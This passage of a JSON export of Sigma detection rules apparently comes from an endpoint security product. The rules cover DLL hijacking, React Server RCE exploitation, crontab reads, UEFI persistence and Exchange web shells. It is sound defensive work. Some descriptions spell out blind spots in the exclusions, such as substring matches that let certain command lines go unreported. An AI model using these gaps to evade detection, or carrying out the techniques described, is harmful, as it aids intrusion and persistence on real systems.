classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'FXSCOVER.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\spool\\DRIVERS\\W32X86\\3\\TPPrnUIENU.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5565ad8d-5653-4d91-a582-0e35a93d3dd5",
"rule_name": "Phantom DLL Hijacking via fxscover.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via fxscover.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "557844a6-9c5c-4790-9e5a-11e64897142a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626073Z",
"creation_date": "2026-03-23T11:45:34.626075Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626080Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_potential_react_server_rce_exploitation_windows.yml",
"content": "title: Potential React-Server RCE Exploitation (Windows)\nid: 557844a6-9c5c-4790-9e5a-11e64897142a\ndescription: |\n Detects a suspicious child process of a Next.js server (a process whose parent command line references next\\dist\\server\\lib\\start-server.js), which can indicate exploitation of the React Server vulnerability (CVE-2025-55182).\n CVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\n Note that the exclusions below are plain substring matches on the child command line (for example '--version' or 'git rev-parse '), so a child process whose command line happens to contain one of them is not reported; when investigating a suspected compromise, review all process creations under the Next.js server rather than relying on this rule alone.\n It is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/06\nmodified: 2026/01/05\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2025-55182\n - classification.Windows.Exploit.React2Shell\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\next\\dist\\server\\lib\\start-server.js'\n\n exclusion_legitimate_subprocesses:\n CommandLine|contains:\n # Jest worker\n - '\\jest-worker\\'\n - '\\jest-worker/'\n # PostCSS\n - '\\dev\\build\\postcss.js'\n - '\\.next\\postcss.js'\n # Transform\n - '\\.next\\transform.js'\n # Node monitoring\n - 'netstat -ano | findstr /C::3000 | findstr LISTENING'\n # Git\n - 'git config --local --get remote.origin.url'\n - 'git rev-parse '\n # Webpack\n - '\\.next\\dev\\build\\webpack-loaders.js'\n - '\\.next\\webpack-loaders.js'\n # Version commands (substring match: any child command line containing this string is excluded)\n - '--version'\n # Node config\n - 'npm config get registry'\n # WMIC discovery\n - 'wmic process where executablepath is not null get executablepath'\n # DOD\n - '\\gc.util.DOD.back\\frontend\\src\\app\\admin'\n # Google Maps\n - '\\GoogleMapsComponents\\googleMapUtils.ts'\n - '\\GoogleMapsComponents\\GoogleMapsTabsComponent.tsx'\n\n 
exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Program Files\\cursor\\Cursor.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "557844a6-9c5c-4790-9e5a-11e64897142a",
"rule_name": "Potential React-Server RCE Exploitation (Windows)",
"rule_description": "Detects a suspicious child process of a Next.js server (a process whose parent command line references next\\dist\\server\\lib\\start-server.js), which can indicate exploitation of the React Server vulnerability (CVE-2025-55182).\nCVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\nNote that the rule's exclusions are plain substring matches on the child command line (for example '--version' or 'git rev-parse '), so a child process whose command line happens to contain one of them is not reported; when investigating a suspected compromise, review all process creations under the Next.js server rather than relying on this rule alone.\nIt is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\n",
"rule_creation_date": "2025-12-06",
"rule_modified_date": "2026-01-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55ac54b8-f0a3-4f7c-8a84-9f40b35ea752",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.556759Z",
"creation_date": "2026-03-23T11:45:34.624882Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624886Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_etc_crontab_read_linux.yml",
"content": "title: Crontab-Related Files Read (Linux)\nid: 55ac54b8-f0a3-4f7c-8a84-9f40b35ea752\ndescription: |\n Detects a suspicious attempt to read \"/etc/crontab\" or other crontab-related files.\n These files contain scheduled tasks, usually run with root privileges, to help maintain the system.\n An attacker can use the list of cron jobs to inject malicious behaviour in unprotected scripts.\n It is recommended to analyze the process responsible for reading the cron files to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/root'\n - '/var/spool/cron/crontabs/*'\n - TargetPath:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/root'\n - '/var/spool/cron/crontabs/*'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/sum'\n - '*/md5sum'\n - '*/sha1sum'\n - '*/sha256sum'\n - '*/lsattr'\n - '*/file'\n - '*/usr/sbin/aide'\n - '/bin/busybox'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/rg'\n - '/usr/bin/rsync'\n - '/usr/local/bin/rsync'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/mksquashfs'\n - '/usr/bin/oscap'\n - '/usr/bin/podman'\n - '/usr/bin/clamscan'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/rpm'\n - '/usr/bin/dpkg'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/zip'\n - '/usr/bin/gnome-control-center'\n - '/usr/bin/sed'\n - '/usr/bin/git'\n - 
'/usr/bin/kdeinit5'\n\n exclusion_image:\n ProcessImage:\n - '/usr/sbin/tripwire'\n - '/opt/endpoint-agent/agent'\n - '/usr/bin/proxmox-backup-client'\n - '/usr/share/auditbeat/bin/auditbeat'\n - '/opt/olfeo/bin/sysconfig'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/vtom/abm/bin/bdaemon'\n - '*/ossec/bin/wazuh-syscheckd'\n - '/opt/bacula/bin/bacula-fd'\n - '/usr/local/Atempo/TimeNavigator/tina/Bin/.tina_bck.real'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/eset/efs/lib/oaeventd'\n - '/opt/eset/efs/lib/odfeeder'\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/opt/ds_agent/ds_am'\n - '/opt/ds_agent/ds_agent'\n - '/opt/sysward/bin/sysward'\n - '/usr/local/sbin/proxmox-backup-client'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/opt/Tanium/TaniumClient/TaniumCX'\n - '/opt/traps/bin/pmd'\n - '/opt/puppetlabs/*/bin/ruby'\n - '/var/ossec/bin/ossec-syscheckd'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/opt/forticlient/scanunit'\n - '/opt/ai-bolit/wrapper'\n - '/opt/netbackup/openv/netbackup/bin/bpcd'\n - '/opt/FortiEDRCollector/bin/FortiEDRCollector'\n - '/opt/Tanium/TaniumClient/extensions/comply/jre/bin/java'\n - '/opt/CrowdStrike/falcon-sensor-bpf*'\n - '/opt/NAI/LinuxShield/libexec/nailsd'\n\n exclusion_cron:\n - ProcessImage|endswith:\n - '/cron'\n - '/crond'\n - ProcessParentImage|endswith:\n - '/cron'\n - '/crond'\n\n exclusion_crontab:\n - ProcessImage|endswith: '/crontab'\n - ProcessParentImage|endswith: '/crontab'\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? 
/usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_dsc_host1:\n ProcessImage: '/opt/dsc/bin/dsc_host'\n ProcessCommandLine|endswith: 'PerformInventoryOOB /etc/opt/microsoft/omsagent/conf/omsagent.d/LinuxFileChangeTracking.mof'\n ProcessGrandparentImage|endswith: 'libexec/platform-python3.?'\n\n exclusion_dsc_host2:\n ProcessParentImage: '/opt/dsc/bin/dsc_host'\n ProcessCommandLine|contains: ' /opt/microsoft/omsconfig/Scripts/'\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_bladelogic:\n ProcessGrandparentImage:\n - '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n - '/opt/bladelogic/*/NSH/bin/rscd_full'\n\n exclusion_yum:\n ProcessCommandLine|contains: '/usr/bin/yum -y update'\n\n exclusion_cortex:\n ProcessImage: '/opt/traps/download/protected_payload_execution/cortex-xdr-payload'\n ProcessGrandparentImage: '/opt/traps/bin/pmd'\n\n exclusion_sap:\n ProcessGrandparentImage: '/usr/sap/hostctrl/exe/saposcol'\n\n exclusion_nautilus:\n ProcessImage: '/usr/bin/nautilus'\n\n exclusion_lynis:\n ProcessParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_wazuh:\n - ProcessImage: '/var/ossec/bin/wazuh-syscheckd'\n - ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - 
'/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_sosreport:\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/*bin/sosreport'\n - '/usr/libexec/platform-python* /usr/sbin/sosreport '\n\n exclusion_kde_kioslave:\n ProcessImage: '/usr/lib/x86_64-linux-gnu/libexec/kf5/kioslave5'\n\n # Used by backup scripts to backup the /etc/ folder\n exclusion_tar_etc:\n ProcessImage: '/usr/bin/tar'\n ProcessCommandLine|contains:\n - ' etc '\n - ' etc/'\n - '/etc '\n - '/etc/'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_s6_supervise:\n ProcessParentCommandLine: 's6-supervise cron'\n\n exclusion_supervisord:\n ProcessParentCommandLine: '/usr/bin/python3 /usr/bin/supervisord -c /supervisord.conf'\n\n exclusion_etckeeper:\n ProcessParentCommandLine|startswith: '/bin/sh /etc/etckeeper/unclean.d/'\n\n exclusion_backup:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/usr/sbin/xivo-backup'\n\n exclusion_containers:\n - ProcessImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains:\n - '/usr/bin/runc|/usr/bin/dockerd|'\n - '/usr/sbin/runc|/usr/sbin/dockerd|'\n - '/usr/sbin/runc|/usr/bin/dockerd|'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/sbin/containerd-shim-runc-v2'\n\n exclusion_snapd:\n ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - '/snap/core/*/usr/lib/snapd/snap-update-ns'\n - '/usr/lib/snapd/snap-update-ns'\n\n exclusion_aide:\n ProcessImage|endswith: '/bin/aide'\n\n exclusion_kalilab:\n - ProcessCommandLine|contains: 
'/var/www/kalilab/'\n - ProcessCurrentDirectory|startswith: '/var/www/kalilab/'\n\n exclusion_facter:\n ProcessCommandLine|startswith:\n - '/usr/bin/ruby /usr/bin/facter --'\n - '/usr/bin/ruby /usr/bin/puppet agent '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_borg:\n ProcessCommandLine|startswith: '/usr/bin/python3 -sp /usr/bin/borg create '\n\n exclusion_chrootkit:\n ProcessParentCommandLine: '/bin/sh /usr/sbin/chkrootkit'\n\n exclusion_vtom:\n ProcessGrandparentImage: '/opt/vtom/abm/bin/bdaemon'\n\n exclusion_python:\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/bin/borg '\n - '/usr/bin/python* /usr/bin/duplicity '\n - '/usr/bin/python3 /usr/bin/unattended-upgrade'\n - '/usr/bin/python3 -s /sbin/sos report'\n\n exclusion_webmin:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/share/webmin/miniserv.pl'\n - '/usr/bin/perl /usr/share/webmin/run-postinstalls.pl'\n\n exclusion_ai-bolit:\n ProcessParentImage: '/opt/ai-bolit/wrapper'\n\n exclusion_nagios:\n - ProcessParentImage: '/usr/sbin/nrpe'\n - ProcessAncestors|contains: '|/usr/sbin/nrpe|'\n - ProcessCommandLine|startswith: '/usr/bin/perl -w /usr/nagios/plugins/check_'\n\n exclusion_cfengine:\n - ProcessParentImage: '/var/cfengine/bin/cf-execd'\n - ProcessAncestors|contains: '|/var/cfengine/bin/cf-execd|'\n\n exclusion_networker:\n ProcessParentImage: '/usr/sbin/nsrexecd'\n\n exclusion_graylog:\n ProcessParentImage: '/usr/bin/graylog-sidecar'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55ac54b8-f0a3-4f7c-8a84-9f40b35ea752",
"rule_name": "Crontab-Related Files Read (Linux)",
"rule_description": "Detects a suspicious attempt to read \"/etc/crontab\" or other crontab-related files.\nThese files contain scheduled tasks, usually run with root privileges, to help maintain the system.\nAn attacker can use the list of cron jobs to inject malicious behaviour in unprotected scripts.\nIt is recommended to analyze the process responsible for reading the cron files to look for malicious content or actions.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "55b1e22e-14ef-432e-89d5-130a2abf8726",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071803Z",
"creation_date": "2026-03-23T11:45:34.071805Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071809Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wpbbin.html",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_possible_execution_from_uefi_persistence.yml",
"content": "title: Possible UEFI Persistence Detected\nid: 55b1e22e-14ef-432e-89d5-130a2abf8726\ndescription: |\n Detects the execution of a process whose image is ?:\\Windows\\System32\\wpbbin.exe, which can be indicative of malicious execution from firmware (UEFI) persistence.\n This binary originates from the Windows Platform Binary Table (WPBT), an ACPI table exposed by the platform firmware: during OS startup, smss.exe (Session Manager Subsystem) writes the firmware-provided binary to the System32 directory as wpbbin.exe and executes it.\n Malicious actors can use this feature as a persistence mechanism by putting a malicious wpbbin.exe into the System32 directory so that it is executed at the next startup.\n The rule only suppresses a wpbbin.exe whose signer is one of a few known OEM vendors (Absolute Software, ASUSTeK, GIGA-BYTE, HP, LENOVO); a wpbbin.exe with any other signer, or with no signature, is reported.\n It is recommended to investigate the wpbbin.exe process to look for potential malicious actions, and to confirm with the hardware vendor that the binary and its signer are expected for this platform.\nreferences:\n - https://persistence-info.github.io/Data/wpbbin.html\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2022/07/20\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1542.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\wpbbin.exe'\n\n filter_legitimate_signature:\n Signature:\n - 'Absolute Software Corp.'\n - 'ASUSTeK Computer Inc.'\n - 'GIGA-BYTE Technology Co.'\n - 'HP Inc.'\n - 'LENOVO'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "55b1e22e-14ef-432e-89d5-130a2abf8726",
"rule_name": "Possible UEFI Persistence Detected",
"rule_description": "Detects the execution of a process whose image is ?:\\Windows\\System32\\wpbbin.exe, which can be indicative of malicious execution from firmware (UEFI) persistence.\nThis binary originates from the Windows Platform Binary Table (WPBT), an ACPI table exposed by the platform firmware: during OS startup, smss.exe (Session Manager Subsystem) writes the firmware-provided binary to the System32 directory as wpbbin.exe and executes it.\nMalicious actors can use this feature as a persistence mechanism by putting a malicious wpbbin.exe into the System32 directory so that it is executed at the next startup.\nThe rule only suppresses a wpbbin.exe whose signer is one of a few known OEM vendors (Absolute Software, ASUSTeK, GIGA-BYTE, HP, LENOVO); a wpbbin.exe with any other signer, or with no signature, is reported.\nIt is recommended to investigate the wpbbin.exe process to look for potential malicious actions, and to confirm with the hardware vendor that the binary and its signer are expected for this platform.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56320185-bef7-49c7-b8cf-e2f646e9ba86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071523Z",
"creation_date": "2026-03-23T11:45:34.071525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071529Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/gossithedog/status/1367168122403368962?lang=fr",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_aspx_creation_microsoft_exchange.yml",
"content": "title: Suspicious File Created linked to Microsoft Exchange Exploitation\nid: 56320185-bef7-49c7-b8cf-e2f646e9ba86\ndescription: |\n Detects the creation of .aspx, .asp or .ashx files inside the Microsoft Exchange web server folders (the IIS aspnet_client directory and the FrontEnd\\HttpProxy owa/ecp auth directories).\n Attackers drop such files as web shells after exploiting the server, as in the HAFNIUM campaign referenced below, which gives them persistent access and a foothold for follow-on activity.\n Note that the rule covers file creation only: the legitimate .aspx files listed in the rule can also be overwritten in place, and files written by msiexec.exe launched from services.exe are excluded.\n It is recommended to investigate the content of the created file to determine its legitimacy.\nreferences:\n - https://twitter.com/gossithedog/status/1367168122403368962?lang=fr\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2022/09/02\nmodified: 2025/07/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection_dir:\n TargetFilename|contains:\n - '\\inetpub\\wwwroot\\aspnet_client\\'\n - '\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\\\???\\auth\\' # owa, ecp\n\n # Legitimate files\n # These legitimate files can be modified in place by attackers, as already seen in the wild (this rule only sees file creation, not modification)\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\ExpiredPassword.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCN.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\errorFE.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\frowny.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\logoff.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\logon.aspx'\n # '\\FrontEnd\\HttpProxy\\owa\\auth\\signout.aspx'\n selection_file:\n TargetFilename|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n\n exclusion_msiexec:\n ProcessCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56320185-bef7-49c7-b8cf-e2f646e9ba86",
"rule_name": "Suspicious File Created linked to Microsoft Exchange Exploitation",
"rule_description": "Detects the creation of .aspx, .asp or .ashx files inside the Microsoft Exchange web server folders (the IIS aspnet_client directory and the FrontEnd\\HttpProxy owa/ecp auth directories).\nAttackers drop such files as web shells after exploiting the server, as in the HAFNIUM campaign referenced by the rule, which gives them persistent access and a foothold for follow-on activity.\nNote that the rule covers file creation only: the legitimate .aspx files listed in the rule can also be overwritten in place, and files written by msiexec.exe launched from services.exe are excluded.\nIt is recommended to investigate the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2022-09-02",
"rule_modified_date": "2025-07-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "568f6fdb-3564-4318-bf83-552ed6516300",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
